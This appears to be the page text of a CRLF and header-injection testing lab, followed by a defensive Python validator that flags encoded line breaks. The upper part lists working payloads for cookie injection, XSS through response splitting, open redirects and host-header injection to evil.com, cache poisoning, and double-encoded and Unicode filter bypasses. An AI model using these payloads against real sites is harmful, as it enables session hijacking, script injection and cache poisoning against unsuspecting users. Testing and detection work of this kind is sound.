CRLF & Header Injection Lab
Advanced HTTP response splitting, header injection, cache poisoning, and open redirect detection suite.
Target Configuration (injection point): URL Parameter, URL Path, Custom Header, Cookie Value, Referer Header
Payload Builder (fields: Injected Header Name, Injected Header Value, Encoding)
Generated Payload: %0d%0aSet-Cookie: session=hacked; Path=/; HttpOnly
Quick Payloads
Cookie Injection: %0d%0aSet-Cookie: injected=1
Open Redirect: %0d%0aLocation: https://evil.com
XSS via Header: %0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert(1)</script>
Cache Poisoning: %0d%0aX-Forwarded-Host: evil.com
Double Encoded: %250d%250aSet-Cookie: evil=1
Unicode Variant: %E5%98%8D%E5%98%8ASet-Cookie: x=1
CRLF + XSS Chain: %0d%0aContent-Length: 0%0d%0a%0d%0a<svg onload=ale\x72t(1)>
Host Header Inject: %0d%0aHost: evil.com%0d%0aX-Forwarded-Host: evil.com
Attack Results
No attack results yet. Configure a target URL with an {INJECT} placeholder, select an attack mode, and click Launch Attack.
Attack Chains Covered
1. CRLF → Cookie Injection: Inject a Set-Cookie header to hijack sessions or bypass CSRF protections.
2. CRLF → XSS: Inject Content-Type plus a body to deliver reflected XSS via response splitting.
3. CRLF → Open Redirect: Inject a Location header to redirect victims to attacker-controlled domains.
4. Cache Poisoning via Headers: Poison X-Forwarded-Host / X-Host to serve malicious cached responses.
5. Unicode / Double Encoded Bypass: Bypass WAF/filters using %E5%98%8D%E5%98%8A and %250d%250a variants.
6. HTTP/2 Pseudo-Header Injection: Exploit H2→H1 downgrade paths to smuggle injected headers into the backend.
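The encodings listed above (raw CRLF, single and double percent-encoding, and the two-byte Unicode variant) are the shapes a server-side validator has to recognise before a value reaches a response header. The following validator is an added defensive example written for this page, not part of the lab's own code. It decodes layer by layer and rejects a value as soon as any layer contains a line break; it also checks each character's low byte, because the %E5%98%8D%E5%98%8A variant decodes to U+560D / U+560A, which only turn into CR/LF on implementations that truncate multibyte characters to one byte when writing headers. The sample inputs are constructed here and are not taken from any real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample inputs, modelled on the payload shapes listed on this page.
SAMPLES = {
    "benign":  "session=abc123; Path=/",
    "raw":     "x\r\nSet-Cookie: injected=1",
    "encoded": "%0d%0aSet-Cookie: injected=1",
    "double":  "%250d%250aSet-Cookie: evil=1",
    "unicode": "%E5%98%8D%E5%98%8ASet-Cookie: x=1",
    "bare_lf": "x%0aLocation: https://example.invalid/",
}

# Cap on decode rounds: a bound keeps the check cheap and deterministic.
MAX_DECODE_ROUNDS = 3


def decode_layers(value: str, rounds: int = MAX_DECODE_ROUNDS) -> list[str]:
    """Return the value followed by each successive percent-decoded layer.

    Stops early once decoding no longer changes the string, so a benign
    value yields a single layer and a double-encoded one yields three.
    """
    layers = [value]
    for _ in range(rounds):
        nxt = unquote(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def has_low_byte_crlf(value: str) -> bool:
    """True if any character's low byte is 0x0D or 0x0A.

    Catches code points such as U+560D / U+560A that a byte-truncating
    header writer would emit as CR / LF.
    """
    return any((ord(ch) & 0xFF) in (0x0D, 0x0A) for ch in value)


def classify(value: str) -> dict:
    """Report whether a value carries a line break and at which decode depth.

    depth 0 = raw input, 1 = after one percent-decode, 2 = after two.
    reason is "crlf" for a literal CR/LF, "low-byte" for the Unicode variant.
    """
    for depth, layer in enumerate(decode_layers(value)):
        if "\r" in layer or "\n" in layer:
            return {"unsafe": True, "depth": depth, "reason": "crlf"}
        if has_low_byte_crlf(layer):
            return {"unsafe": True, "depth": depth, "reason": "low-byte"}
    return {"unsafe": False, "depth": -1, "reason": None}


def safe_header_value(value: str) -> str:
    """Reject rather than strip: raising is safer than silently rewriting input."""
    result = classify(value)
    if result["unsafe"]:
        raise ValueError(
            f"header value rejected ({result['reason']} at decode depth {result['depth']})"
        )
    return value


def scan_samples() -> dict:
    """Classify every constructed sample; handy for a quick self-check."""
    return {name: classify(value) for name, value in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:8s} -> {verdict}")
```

Rejecting instead of stripping matters: a filter that deletes CR/LF can be fooled by encodings it does not decode, whereas a reject-on-any-layer check fails closed. The decode depth in the verdict is also useful detection telemetry, since benign clients almost never send double-encoded line breaks.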